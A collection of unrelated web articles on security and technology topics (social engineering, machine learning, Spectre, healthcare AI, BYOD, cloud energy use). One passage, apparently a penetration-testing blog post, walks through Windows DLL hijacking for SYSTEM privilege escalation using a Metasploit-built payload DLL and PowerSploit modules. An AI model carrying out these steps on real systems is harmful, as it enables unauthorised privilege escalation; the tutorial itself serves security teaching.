“Our results suggest that simple generalization is not suited for effectively anonymizing web tracking data. The data remain sharp to the person and anonymization is ineffective. To reach effective data protection, methods extending far beyond have to be applied, such as noise by the random insertion of minor misobservations into the data,” Strufe recommends. | <urn:uuid:333d7738-b3ba-43dc-ac96-985575b45f9e> | CC-MAIN-2022-40 | https://www.helpnetsecurity.com/2020/06/22/generalization-of-tracking-data/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00518.warc.gz | en | 0.938591 | 806 | 3 | 3 |
Since well-known hacker Kevin Mitnick helped popularize the term 'social engineering' in the 1990s, both physical and cybersecurity professionals have become increasingly aware of the risks associated with the human element. The idea itself, and many of the techniques associated with social engineering, have been around as long as there have been scam artists.
But today an online trickster can wreak havoc for individuals and organizations with greater ease and efficiency than ever before. That hackers exploit common psychological vulnerabilities to compromise network security or steal funds is not news. What is news is how those vulnerabilities are changing, and how they will reshape the cybersecurity landscape for the foreseeable future.
The Evolution of Social Engineering through the Pandemic
By exploiting human nature through fear, the illusion of urgency, scarcity or familiarity, or simply the default human tendency to trust others, hackers have continued to repurpose well-worn tactics to convince unsuspecting users to follow their directions. Whether that has meant sending funds or providing credentials, hackers have continued to use simple psychological techniques to fool even attentive individuals at both home and at work. The ability of hackers to get past our technological and human defenses can be surprising and frightening, as well as costly.
Making matters worse, hackers have recently discovered another exploitable human vulnerability: stress. Social, political, and economic instabilities dominate daily newscasts, and trust and confidence in authorities, as well as in our neighbors and coworkers, has been badly shaken.
Work-related stress, exhaustion, cynicism, and negativity have surged during the pandemic, with 42 % of women and 35% of men in the United States saying that they feel burned out often or almost always in 2021. Baseline behavioral health has significantly declined during the COVID-19 pandemic, and employees are still discovering how to work in a remote-first world. Distraction, stress, and fatigue all play a role in an employee’s cybersecurity decisions and increased levels can leave individuals and organizations more vulnerable to cybercrime.
The Connection Between Stress and Cybersecurity
Stress affects concentration, short-term memory, decision-making, problem-solving, and impulse control—all behavioral factors that can increase vulnerability. Opening the wrong email attachment or clicking on the wrong link when someone is frazzled can have catastrophic consequences. It is important to recognize the important behavioral reality that, as stress increases, situational awareness and vigilance decrease, and executional errors increase. There is little denying that human errors are the leading cause of security breaches, despite increased attention on the issue.
The risk of an outsider threat also increases as hackers realize that employees have their guards down due to emotional exhaustion or pandemic fatigue. Anger or resentment about an organization’s posture on vaccines, masks, or other health or social and political issues can increase the risk of an outsider threat. Employees with a real or perceived grievance may feel justified in striking back through a malicious action, alone as an insider, or be more open to working with an external threat actor who recruits them for espionage or sabotage.
Cybersecurity in a Post-Pandemic World
Unfortunately, the behavioral health consequences of the pandemic are just beginning to surface and will likely emerge to be as great or greater than the challenges of managing the medical risks of COVID-19. The American Psychological Association’s annual Stress in America poll indicates that the COVID-19 pandemic has already resulted in significant mental health distress with nearly half (48%) of those surveyed stating that their level of stress has increased compared with before the pandemic.
And the emotional toll of the pandemic is also likely to linger. While hackers have taken note of the gradual wear and tear on people’s defenses, and have sought to exploit these emerging human vulnerabilities, they may not yet be fully aware of their long-term potential. The behavioral consequences of this crisis will likely continue for several years after the public health threat has abated.
Protecting the People from Themselves
People are the weakest link in the cybersecurity chain. That link was already weak simply due to innate cognitive and behavioral traits that are just part of human nature. That said, it is increasingly important for anyone concerned with cybersecurity to recognize that this link has grown weaker under the stress of the pandemic and related socio-economic challenges, and that it is likely to grow weaker yet over the next months and years.
In addition to working with partners, including human resources and employee assistance professionals, to better support our employees, it will be necessary to use technology to protect the human element. By using the advanced strategies and technologies to recognize and block malicious attempts to exploit our employees, we can better protect them, and our organizations, from harm.
To learn more about the human element in cybersecurity, download A Perfect Storm for Social Engineering: Anticipating the Human Element in Post-Pandemic Cybersecurity. | <urn:uuid:baa103ee-ebf3-46e8-b8bc-44feae4f0b7f> | CC-MAIN-2022-40 | https://abnormalsecurity.com/blog/weakest-link-employees-cybersecurity | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00518.warc.gz | en | 0.954714 | 986 | 2.9375 | 3 |
The security industry is rife with data protection challenges. It faces catastrophic cyberattacks. And the troubles continue to mount with the rise of web-connected devices. Adding salt to the injury, is the shortage of skilled cyber talent, which fail to avert the burgeoning stress. With snowballing disruption, a prominent branch of technology development that shows promising signs to alleviate the security risks is machine learning. It has opened a new realm of data protection by leveraging the power of data and automation.
Machine learning is a branch of artificial intelligence (AI) and works on the principles of human emulation — learning from experience and patterns much like humans, but without the interference of humans. The technology has greatly grown in the past five years. The evolution can be attributed to a host of reasons. Including smart hardware, distributed computing, and the Cloud. Google, Facebook, and Amazon are already stealing ahead on the path of machine learning innovation. They enable smart search engines, dynamic news feeds, and unerring product recommendations respectively.
Machine learning: disruption sweeping the security landscape
Back in the day, companies relied static, rule-based engines to identify behavioral patterns that indicate looming threats. However, these indications often fell off the mark. The success rate was low. With advancements in machine learning, companies are empowered with data deception technology and real-time anomaly handling that leave no scope for guesswork and manual intervention. Subsequently, the reaction to breaches has also smartened up.
The process is seeped into the essentials of big data. Organizations integrate a pool of behavioral data from various sources. This consumer data is cleaned, organized, and analyzed for insights that show anomalies (dangers at hand) and alert authorities to act. When smart personnel meets smarter technology that transforms over time, a unique springboard of opportunity is created, facilitating defenders to combat cyberattacks effectively.
Machine learning as a security net
- Swift detection of malicious activities
- Machine Learning algorithms are instrumental in detecting malicious activities swiftly and mitigating them in a time-bound manner. The vulnerabilities are diagnosed within seconds and eliminated on the fly before they can unleash damage to the organization.
- Analysis of mobile touch-points
- Machine learning is coming to mobile phones with a great tempo, and the amalgam is galvanizing a new era of information security. While the most important application remains the image recognition systems and voice-based experiences powered by Google Assistant, Amazon’s Alexa, and Apple’s Siri, the future possibilities are endless and unprecedented. Machine learning, coupled with AI and the Internet of Things (IoT), collects data and leverages the value of it to enable devices that function on their own and take informed decisions. Subject detection by smart cameras and translating languages in real-time are other significant applications.
- Automated redundant tasks
- Automating repetitive tasks is the cornerstone benefit of every new-age digital technology gracing the humankind, and Machine learning is no exception. According to the team at techiespad, ML-based algorithms can take up tactical fights against mundane security issues, thereby freeing time for other strategic priorities. This is a strong step towards intelligent resource allocation and improved productive capacity.
- Improved human analysis
- Machine learning enhances and consolidates human analysis to an unmatched level. Humans are empowered to detect, analyze, and mitigate threats with greater quality and precision across an array of aspects that includes network analysis, endpoint protection, and vulnerability assessment.
- Effective zero-day vulnerability closure
- Zero-day attacks appear like a bolt out of the blue, targeting unsecured IoT devices. And, use cases suggest that machine learning is an effective weapon to counter such attacks. The technology works by dodging vulnerabilities and restricting the patch exploits before they end up as data breaches.
The encircling dangers
Machine learning has its dangers too.
Attackers are deploying machine learning too with a view to achieving automated hacks that sabotage data security. The ‘bad actors’ are launching savvier attacks after studying and analyzing the machines on target and identifying vulnerabilities on the go.
Data tampering is another big roadblock to effective machine learning application. If attackers tamper with the source data, they manipulate the insights and trick systems into believing something that isn’t there. Attackers hatch out strategies to manipulate features of malware-detection code and eliminate its effectiveness, thereby rendering the algorithm powerless. As a result, malware codes pass on as clean codes. The hacking of data and turning it against itself is a security crisis that needs a speed fix. Building scalable systems that could accommodate large databases while adapting to human behavior in real-time is also a tightrope walk.
Commercializing machine learning is worrisome. Companies are capitalizing on the huge hype around the technology and selling products that create a false sense of security. The catchphrase here is ‘supervised learning’, which entails choosing and labeling databases that algorithms are trained on. The algorithms, as a result, become defensive against a cache of attacks, a certain few and known. Not all and anomalous.
And last but not least, it’s the language that acts as barrier to machine learning application. Remember how Facebook was forced to abandon its AI experiments when machines developed their own language, which were strange for the humans to interpret. The kind of deep learning applied there must be unimaginably powerful. Empowering machines to function on their own is the new, fascinating talk, but the implications could be ruinous if machine process text to create language humans can’t understand.
Machine learning is a strong stimulus, raising a new set of machine-accelerated humans and building best-of-the-breed security landscape. As of now, the technology is flourishing to help detect and obliterate security threats. In the future, a strong level of differentiation will be achieved when ML specialization becomes handy via breakthrough products. However, it’s important for companies to develop products while focusing on the need for monitoring and minimizing the risks associated. Mind that we are as strong as vulnerable in the face of fast-streaming digital renaissance. Enthusiastic hopping on the bandwagon can wobble the ride. | <urn:uuid:eee9b477-0337-4b38-ae2e-118282ae0ba5> | CC-MAIN-2022-40 | https://www.crayondata.com/machine-learning-and-information-security-impact-and-trends/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335124.77/warc/CC-MAIN-20220928051515-20220928081515-00718.warc.gz | en | 0.931204 | 1,252 | 2.9375 | 3 |
In Windows environments when an application or a service is starting it looks for a number of DLL’s in order to function properly. If these DLL’s doesn’t exist or are implemented in an insecure way (DLL’s are called without using a fully qualified path) then it is possible to escalate privileges by forcing the application to load and execute a malicious DLL file.
It should be noted that when an application needs to load a DLL it will go through the following order:
- The directory from which the application is loaded
- The current working directory
- Directories in the system PATH environment variable
- Directories in the user PATH environment variable
Step 1 – Processes with Missing DLL’s
The first step is to list all the processes on the system and discover these processes which are running as SYSTEM and are missing DLL’s. This can be done just by using the process monitor tool from Sysinternals and by applying the filters below:
Process Monitor will identify if there is any DLL that the application tries to load and the actual path that the application is looking for the missing DLL.
In this example the process Bginfo.exe is missing several DLL files which possibly can be used for privilege escalation.
Step 2 – Folder Permissions
By default if a software is installed on the C:\ directory instead of the C:\Program Files then authenticated users will have write access on that directory. Additionally software like Perl, Python, Ruby etc. usually are added to Path variable. This give the opportunity of privilege escalation since the user can write a malicious DLL in that directory which is going to be loaded the next time that the process will restart with the permission of that process.
Step 3 – DLL Hijacking
Metasploit can be used in order to generate a DLL that will contain a payload which will return a session with the privileges of the service.
The process Bginfo.exe it is running as SYSTEM which means these privileges will be granted to the user upon restart of the service since the DLL with the malicious payload will be loaded and executed by the process.
As it has been identified above the process is missing the Riched32.dll so the pentestlab.dll needs to be renamed as Riched32.dll. This will confuse the application and it will try to load it as the application will think that this is a legitimate DLL. This malicious DLL needs to be dropped in one of the folders that windows are loading DLL files.
As it can be see below when the service restarted a Meterpreter session opened with SYSTEM privileges through DLL hijacking.
The process of DLL hijacking can be done also through PowerSploit since it contains three modules that can assist in the identification of services that are missing DLL’s, discovery of folders that users have modification permissions and generation of DLL’s.
The module Find-ProcessDLLHijack will identify all the processes on the system that are trying to load DLL’s which are missing.
The next step is the identification of paths that the user can modify the content. The folders identified will be the ones that the malicious .DLL needs to be planted.
The last step is to generate the hijackable DLL into one of the folders that have been identified above with Modify (M) permissions.
In order to be able to escalate privileges via DLL hijacking the following conditions needs to be in place:
- Write Permissions on a system folder
- Software installation in a non-default directory
- A service that is running as system and is missing a DLL
- Restart of the service
Discovering applications that are not installed in the Program files it is something common as except of third-party applications that are not forced to be installed in that path there is a possibility of a custom-made software to be found outside of these protected folders. Additionally there are a number of windows services like IKEEXT (IKE and AuthIP IPsec Keying Modules) that are missing DLL’s (wlbsctrl.dll) and can be exploited as well either manually or automatically. For IKEEXT there is a specific Metasploit module: | <urn:uuid:880cc51f-6205-4297-b09c-c549a52881ff> | CC-MAIN-2022-40 | https://pentestlab.blog/2017/03/27/dll-hijacking/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00718.warc.gz | en | 0.931009 | 929 | 2.59375 | 3 |
Major tech firms are rushing to patch critical bugs, dubbed ‘Spectre’ and ‘Meltdown’, found in their processors before they can be exploited.
Researchers from Google’s Project Zero team have revealed serious issues in a vast array of chips across multiple manufacturers. The flaws date back as far as 1995.
There are three known variants of the issue so far. Spectre, which covers two of them, was discovered in chips made by Intel, AMD and ARM, while Meltdown affects Intel products and a recent ARM processor.
“As soon as we learned of this new class of attack, our security and product development teams mobilized to defend Google’s systems and our users’ data. We have updated our systems and affected products to protect against this new type of attack,” Google announced. “We also collaborated with hardware and software manufacturers across the industry to help protect their users and the broader web.”
Read more: Satori malware code made public by hackers
As we lead ever more connected lives we are becoming more at risk of malicious attacks against our devices. Even hotels in the Austrian Alps have had their electronic doors hacked.
Many manufacturers have been blasé when it comes to IoT security but there is an urgent need to develop security alongside the new devices being introduced. We can be sure that cyber-criminals will be probing for new vulnerabilities and ‘grey hat’ hackers such as the creator of Brickerbot have proven the very real security risks faced by the Internet of Things.
Meltdown and Spectre allow the techniques used by processors to speed up their operation to be abused to obtain information about areas of memory not normally visible to an attacker, including encryption keys, passwords and other sensitive data.
A technical explanation of the vulnerabilities can be found in Project Zero’s report. Most devices, from smartphones and PCs, to servers and IoT devices are at risk from unprivileged code reading data it should not be able to access.
The Google researchers have offered possible solutions to the processor vendors, though the vendors themselves are ultimately best-placed to tackle the issues, given their exclusive knowledge of their own chip architectures.
Vendors scramble to patch the holes
AMD has issued a statement since the vulnerabilities emerged, emphasising the company’s commitment to information security but offered some assurances: “The research described was performed in a controlled, dedicated lab environment by a highly knowledgeable team with detailed, non-public information about the processors targeted.” The company adds that “the described threat has not been seen in the public domain.”
Nonetheless, the company is planning to make software and operating system updates available that will resolve the issue with negligible performance impact.
ARM’s processors are used in countless smartphones and IoT devices and the Softbank-owned company has promised “all future Arm Cortex processors will be resilient to this style of attack or allow mitigation through kernel patches” and, given that the exploits are dependant upon malware running locally, emphasises the need for users to practice good security hygiene.
With Intel also planning to realise security patches over the next few days, the flaws should soon be shored up. However, uncomfortable reports are emerging, claiming that Intel CEO Brian Krzanich was told of the flaws in June last year, subsequently selling a large portion of his stake in the company, while the issues were not yet public knowledge.
Regardless of whether the stock sale was related, Intel, AMD and ARM will all be eager to see Meltdown and Spectre put to bed so that they can turn their focus back to their product roadmaps for 2018 and beyond. | <urn:uuid:dc78230d-6027-46cb-b378-13d363951ae4> | CC-MAIN-2022-40 | https://internetofbusiness.com/serious-security-flaws-spectre-meltdown-haunting-intel-amd-arm-chips/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00718.warc.gz | en | 0.964918 | 756 | 2.75 | 3 |
Researchers have recognized different gene tissue functions implemented from core biological machinery. It largely shared across tissues, rather than from their own individual regulators.
Researcher at Kimberly Glass, PhD, of the Channing Division of Network Medicine, Brigham and Women’s Hospital and her team explain PANDA Passing Attributes between Networks for Data Assimilation to create network models. The interactions between transcription factors and genes, finding that the presence of different tissue functions is the result of subtle, tissue-specific shifts in a regulatory network.
Genotype-Tissue Expression (GTEx) consortium
For each tissue-specific functions the network core components are same. In different ways with added genetic and environmental information. The team analyzed data from the Genotype-Tissue Expression (GTEx) consortium. Among other regulatory information sources, to reconstruct and characterize regulatory networks for 38 tissues.
The model PANDA created by Glass and her team in 2013. Recognized for this investigation it exactly model interactions between transcription factors. To control where, when and to what extent genes get activated. An important step in understanding patterns in the network and genes is complex interactions between transcription factors. Further, it inform how gene regulation implements a variety of specific tissue functions.
There are approximately 30,000 genes in the human genome
Moreover, the specific tissue function regulation is largely independent of transcription factor. There are approximately 30,000 genes in the human genome. But less than 2,000 of them encode transcription factors.
“A large number of processes must carry out for a tissue to function properly,” said Glass. “Rather than activating particular transcription factors to carry out these various processes. We find the networks connecting these regulators to target genes is reconfigured to more effectively coordinate the activation of tissue functions.”
However, the work highlights the importance of specific tissues when developing drug therapies. Shifted regulatory networks control different functions. More important in order to understand the potential side effects of drugs outside of the target tissue. | <urn:uuid:eee7852f-1844-4350-b00a-4ab71a6f2098> | CC-MAIN-2022-40 | https://areflect.com/2017/10/28/gene-regulation-of-specific-tissue-recognized-using-networks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00718.warc.gz | en | 0.914075 | 401 | 2.578125 | 3 |
Crucial time and tremendous amounts of resources are lost every day in the world’s healthcare systems. Misdiagnoses cost unnecessary additional tests, result in delayed treatment plans and diminished survival or remission rates from what would have transpired had it been caught and identified correctly earlier. False positives on tests. Trials, treatments and research completed in silos so there’s no leveraging the insights across the country or the world.
Machine learning offers lots of opportunities for the healthcare industry
Some healthcare and technology innovators are collaborating and trying to change our current reality by experimenting with artificial intelligence (AI) and machine learning. Computers and the algorithms they run can scrub colossal amounts of data—much faster and more accurately than human scientists or medical professionals—to unearth patterns and predictions to enhance disease diagnosis, inform treatment plans and enhance public health and safety.
Based on the extraordinary impact improvements to the healthcare system can have for so many people and its potential to save lives and money, healthcare has become a key industry for investment and efforts for AI and machine learning. Not only have major players such as IBM and Microsoft jumped into their own AI healthcare projects, but several start-ups and smaller organisations have begun their own efforts to create tools to aid healthcare.
And, the savings would be tremendous. One report from McKinsey estimates big data could save medicine and pharma up to $100B annually as a result of improved efficiencies in clinical trials and research, better insight for decision-making and new tools that will help insurers, regulators, physicians and consumers make better decisions.
Machine learning algorithms improve the more data they are exposed to. If there is one thing the healthcare systems has in abundance, it’s data. Due to different storage systems, ownership and privacy concerns, and no established process that allows people to easily share data with each other, there is a major amount of analysis that’s not currently being done that could glean tremendous results for patients, doctors and healthcare organisations.
AI aids in disease identification and diagnosis
Much of the AI work done thus far in healthcare is focused on disease identification and diagnosis. From Sophia Genetics that is using AI to evaluate DNA to diagnose illnesses to smartphone apps that can determine a concussion and monitor other concerns such as newborn jaundice, lung function of those suffering from chronic respiratory diseases, blood pressure, Haemoglobin levels and even evaluate coughs, disease and health monitoring is at the forefront of the machine learning efforts.
Since heart disease is a primary killer of human beings around the world, it’s no surprise that effort and focus from many AI innovators is on heart disease diagnosis and prevention. The current process to determine an individual’s risk factor for a heart attack is to look at the American College of Cardiology/American Heart Association’s (ACC/AHA) list of risk factors that include age, blood pressure and more. However, this is really a simplistic approach and doesn’t take into account medications someone might be on, the health of the patient’s other biological systems and other factors that could increase odds of a heart ailment. Several research teams, including those at Carnegie Mellon University and a study from Stephen Weng and his associates at University of Nottingham in the United Kingdom, are working toward enhancing machine learning so algorithms will be able to predict (better than humans) who is at risk and when they might be at risk for a heart attack. Preliminary results of the AI algorithms were significantly better at predicting heart attacks than the ACC/AHA guidelines.
From liver disease to cancer and even psychosis and Schizophrenia, AI algorithms are changing the game in terms of disease diagnosis. Machines are now learning how to read CT scans and other imaging diagnostic tests to identify abnormalities. Although some predict the end of radiologists as we know them, others see AI acting as a radiologist’s assistant.
Crowdsourcing Treatment Options and Monitoring Drug Response
Another area where AI can impact healthcare is in the way information is gathered and shared about disease treatment. Dr. Tony Blau is one researcher who launched a start-up to put social media to work to connect people to share different cancer treatment options. Another group used Twitter and Facebook for pharmacovigilance as a way to source info about drug trials that might not have been reported to the industry or regulatory agencies. AI is already being used by the pharma industry in the initial screening of drug compounds as well as to determine what drugs might work better for individuals based on their biology.
Monitor Health Epidemics
There has already been some powerful indicators of AI’s influence to help monitor and predict health epidemics around the world, and in one case a computer algorithm identified an Ebola outbreak nine days before the World Health Organisation reported it. The computer sifted through social media sites, news reports and government websites to identify there was an outbreak. As with any algorithm, the more data it is given, the more learning is achieved and therefore the better it is in the future. Although the current work to identify outbreaks is imperfect, it has significant potential.
Artificial intelligence and machine learning in healthcare will continue to get better and impact disease prevention and diagnosis, extract more meaning from data across various clinical trials, help develop customised drugs based on an individual’s unique DNA and inform treatment options among other things. | <urn:uuid:6f5fc4a5-e9c3-4330-b993-6d7455fedc5d> | CC-MAIN-2022-40 | https://bernardmarr.com/artificial-intelligence-and-machine-learning-in-healthcare/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337529.69/warc/CC-MAIN-20221004215917-20221005005917-00718.warc.gz | en | 0.95152 | 1,086 | 3.265625 | 3 |
As part of their joint security awareness campaign aimed at the general public, the Fédération romande des consommateurs (FRC) and Navixia aim to point out the dangers of the internet and teach everyone how to avoid them. The operation combines information articles and fun security quizzes.
Topic of the month: Computer security: security gestures in our daily life
Some websites, applications or networks repeatedly require us to perform simple actions related to security. We comply mechanically, without thinking twice about it, because we want to access the proposed service. Still, all these precautions get boring over time. But maybe we don't understand how meaningful they really are... Or do we?
Read the article "Mots de passe et sécurité informatique: restez vigilant" by FRC (in French), and take our interactive quiz.
Maybe your score will surprise you ? | <urn:uuid:a48d7e2a-a487-4553-a849-5834739aad6f> | CC-MAIN-2022-40 | https://navixia.com/en/article/permis-informatique-avec-la-frc-10 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00118.warc.gz | en | 0.888988 | 184 | 2.609375 | 3 |
Illustration of packets and frames
This figure shows an example of an IP packet with the naming conventions used for the different parts of the packet and the frame.
The figure in Illustration of packets and frames also shows where the various encapsulation fields are located:
- ISL encapsulation of a MAC frame is done by inserting an ISL header in front of the MAC header and an ISL CRC after the MAC CRC.
- VLAN tags can be inserted inside the MAC header by using a 0x8100 or 0x88A8 length/type value. The last VLAN tag holds the protocol type of the packet.
- MPLS labels can be inserted after the MAC header (or after the last VLAN tag) by using a 0x8847 or 0x8848 length/type value. If a frame is MPLS-encapsulated, the packet is assumed to be an IP packet.
Note: In this document inner layers, inner fragments, inner packets, inner hash keys and so on refer to the first tunnel discovered. Deeper tunnels are not decoded. | <urn:uuid:98967e52-574f-4d2a-8a88-42c5e151a5dd> | CC-MAIN-2022-40 | https://docs.napatech.com/r/Feature-Set-N-ANL9/Packets-and-Frames | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00118.warc.gz | en | 0.797509 | 236 | 3.125 | 3 |
The Americans with Disabilities Act (ADA) is a federal law that U.S. Congress enacted and signed into law in July of 1990 and has since expanded. The Act protects individuals with disabilities who work and seek employment within the United States.
The Act’s purpose is to ensure that ALL employees companies are provided with reasonable accommodation to perform their jobs. For instance, companies may require at least one translator (or interpreter) to translate English into Sing Language and vice versa. An interpreter is especially critical in specific fields such as engineering or medicine because of the specialized nature of the information needed. If an employee or client cannot comprehend communications, they will have a hard time understanding crucial information involved in the workplace. These misunderstandings can mean someone’s life in medical settings and someone’s future on legal grounds.
The ADA ensures that individuals with disabilities are given the same opportunity for employment as other individuals. Any individual with a disability who experiences discrimination can use the ADA law for protection in court.
What are some of the steps that a business owner can take to ensure that they comply with the ADA? Business organizations must register with the Department of Labor. Once they become registered, they are required to undergo many tests and monitoring procedures to ensure compliance. Managers and employees should also begin by undergoing cultural competency training and awareness presentations. | <urn:uuid:8336e263-3d55-46d7-8169-f4899a8a59cf> | CC-MAIN-2022-40 | https://www.drware.com/why-business-owners-should-know-about-the-americans-with-disabilities-act/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00118.warc.gz | en | 0.953151 | 271 | 3.59375 | 4 |
For those born prior to the year 2000, the rapid acceleration of technological adoption is almost unbelievable. But for those who never really experienced the pre-digital age, the shift toward tech-centric everything is business as usual. Today’s children and teenagers have never had to complete some of the most basic functions without the Internet or mobile devices, and yet school administrators expect them to learn and thrive in an academic environment that has hardly changed in the last 30 years.
Because the needs of students are quickly moving toward more digital curriculum, the role of technology in the classroom is rapidly evolving. While funding for technology in schools reached about $800 million in the early 2000s, this year that number has jumped to almost $12 billion. School administrators and teachers alike are beginning to realize that teaching students in media they already feel comfortable with is a much easier task than trying to make kids embrace outdated methods.
According to research conducted by education software company Sungard, the most popular digital technology to use in the classroom is a laptop, with 71 percent of kids ages 8 to 18 reporting having used such a device for school work. Half of those surveyed also used their smartphones for classwork and 44 percent used tablets. Of the students who used tablets in class, 52 percent had their own devices to work with and another 28 percent shared the device with family members. Only 20 percent reported using tablets provided by the school.
Bring-your-own-device programs are already quite popular in the business world and are now making their way into schools. Just as teachers are bringing technology into the classroom because their students access information online and through apps, allowing kids to bring their own devices enables them to learn and explore on a machine they already feel comfortable with. While the logic behind school BYOD initiatives may be sound, it can be difficult to implement such programs effectively. Continue reading for four tips to make deploying classroom BYOD go more smoothly.
1) Ensure reliable bandwidth is available
One of the most obvious requirements for school BYOD is also one of the most frequently overlooked. Deploying BYOD will have a dramatic impact on schools’ bandwidth, and IT administrators need to be prepared for the spike in demand.
2) Create guidelines for appropriate use of devices
While technology has proven to be beneficial in educational environments, it also creates temptation for students to get off task. Explaining to the class what constitutes appropriate behavior while using devices before they are introduced can help cut down on unwanted distractions.
3) Create lesson plans with BYOD in mind
When introducing a new medium into the curriculum, it doesn’t always work to use the same lesson plan created for a different outlet. Planning lessons that have been specifically designed for the devices that are going to be used get the most out of the technology. Creating a list of websites and applications that are particularly beneficial for certain subjects is a great resourced and will help keep students engaged and focused.
4) Well balanced learning is essential
As beneficial as the Internet and digital technology can be for children as they learn, time away from screens is also important. Creating an equal balance of on- and off-screen learning allows for an ideal mix of stimulation.
By taking these suggestions to heart, teachers and school administrators can greatly improve the learning experiences of their students. However, the advantages schools receive by implementing technology are worth nothing if the devices and programs aren’t managed effective and kept safe from cyber threats.
Faronics Insight classroom management software offers schools a program through which they can establish device settings, access software upgrades and maintain control over what students are looking at with their devices during lessons. Security updates can be scheduled to download automatically in order to protect against any unknown bugs or vulnerabilities and student work can be shared safely through a private online portal. Technology is becoming an increasingly vital part of education, so help keep IT investments secure with Faronics. | <urn:uuid:50f45038-a7ac-4318-89ed-16ca8b9905ee> | CC-MAIN-2022-40 | https://www.faronics.com/news/blog/4-ways-to-employ-byod-successfully-in-schools | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00118.warc.gz | en | 0.964313 | 785 | 3.15625 | 3 |
Keeping your mobile device free of malware is an important side of securing your data and privacy. The other side is what can be done to secure the device if it falls into the wrong hands.
For our 100 days of security, we’ll share tips on securing your device.
Remote Wipe Have the ability to remotely wipe your device if lost or stolen is great for these worst case scenarios.
Smartphone thefts have increased multiple times over in the last couple of years, to the point where some states are looking to enforce carriers to offer a kill switches that will disable the phone.
Android and iOS devices come with native lost device protection, we suggest setting up one of these or you can find some pretty good ones in your favorite app store.
An important element to the remote wipe is taking the time to backup your device, images contacts and important data.
Mobile operating systems do come with backup software like iCloud or Google Backup.
Lost or stolen devices significantly increase your risk or identity theft. Enabling built locking features such as PIN codes and passwords are a great first line of defense to keep unwanted access to device blocked.
Using safe practices when accessing free WiFi hotspots can keep your data secure. We suggest not logging into any secure websites while connected to a free hotspot.
Having your data encrypted is additional layer of protection if your device falls into the wrong hands.
The latest versions of iOS and Android now have encryption enabled out of the box, but if you're still running one of the older versions you could still enable some form of encryption for your data. There are also third-party encryption apps available in the app stores.
Taking these additional steps to secure your mobile computing might be inconvenient at first but taking a proactive approach with security will benefit you in the long run--even if it's just a piece of mind. | <urn:uuid:4e57da08-fc18-410b-b65f-8b4d4e816646> | CC-MAIN-2022-40 | https://www.malwarebytes.com/blog/news/2015/01/keeping-a-secure-mobile-device | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00118.warc.gz | en | 0.918973 | 384 | 2.703125 | 3 |
Cloud computing adopters may find an unanticipated edge when moving to this IT model: the ability to trim energy consumption.
Cloud proponents often cite the ability to rapidly scale resources as the initial driver behind cloud migration. This elasticity lets organizations dial up — and dial down — compute power, storage and apps — to match changes in demand.
The resulting efficiency boost cuts cost and makes for a solid business case. But the cloud also has a green side: The technology, when deployed with care, can reduce your power usage and carbon footprint.
The linchpin cloud technologies — virtualization and multi-tenancy — support this dual role. Virtualization software lets organizations shrink the server population, letting IT departments run multiple applications — packaged as virtual machines — on a single physical server. Storage arrays can also be consolidated and virtualized. This process creates resource pools that serve numerous customers in a multi-tenant model.
Enterprises that recast their traditional data centers along cloud lines, creating so-called private clouds, have an opportunity to move toward energy conservation. A number of metrics have emerged to help chart that course. Power usage effectiveness (PUE), SPECpower, and utilization in general are among the measures that can help organizations track their progress.
IT managers, however, must remain watchful to root out inefficient hardware and data center practices as they pursue the cloud’s energy savings potential.
Working in Tandem
EMC Corp. has found that streamlined IT and energy savings work in tandem in its private cloud deployment. The company embarked on a consolidation and virtualization push as its IT infrastructure began to age.
Jon Peirce, vice president of EMC private cloud infrastructure and services, describes the company’s cloud as “a highly consolidated, standardized, virtualized infrastructure that is multi-tenant within the confines of our firewall.”
EMC hosts multiple applications within the same standardized, multi-tenant infrastructure, he added.
As for energy efficiency, virtualized storage has produced the greatest impact thus far. EMC, prior to the cloud shift, operated 168 separate storage infrastructure stacks across five data centers. In that setting, capacity planning became nearly impossible. The company started buffering extra capacity, which led to device utilization of less than 50 percent, explained Peirce.
Poor utilization wasn’t the only issue. EMC found storage to consume more electricity per floor tile than servers in its data centers.
“The first thing we did in our journey toward cloud computing was to take the storage component and collapse it to the smallest number we thought possible,” says Peirce.
EMC reduced 168 infrastructure stacks to 13, driving utilization up to about 70 percent in the process. Consolidation reduced the overall storage footprint, which now grows at a slower rate going forward since the company doesn’t have to buffer as much.
Storage tiering also contributed to energy reduction. In tiering, application data gets assigned to the most cost-effective — and energy-efficient — storage platform. EMC was able to re-platform many applications from tier-one Fibre Channel disk drives to SATA drives, higher-capacity devices that consume less electricity per gigabyte.
“That let us accommodate more data per kilowatt hour of electricity consumed,” says Peirce.
Moving data to energy-efficient drives contributed to the greening of EMC’s IT.
Together, tiering and consolidation cut EMC’s data center power requirement by 34 percent, leading to a projected 90-million-pound reduction in carbon footprint over five years, according to an Enterprise Strategy Group audit.
Getting the Most From the Cloud
John Stanley, research analyst for data center technologies and eco-efficient IT at market researcher The 451 Group, said energy efficiency may be divided into two categories: steps organizations can take on the IT side, and steps they can take on the facilities side.
On the IT side, the biggest thing a data center or private cloud operator can do to save energy is get as much work out of each hardware device as possible, says Stanley. Even an idle a server may consume 100 to 250 watts, so it makes sense to have it doing something, he notes.
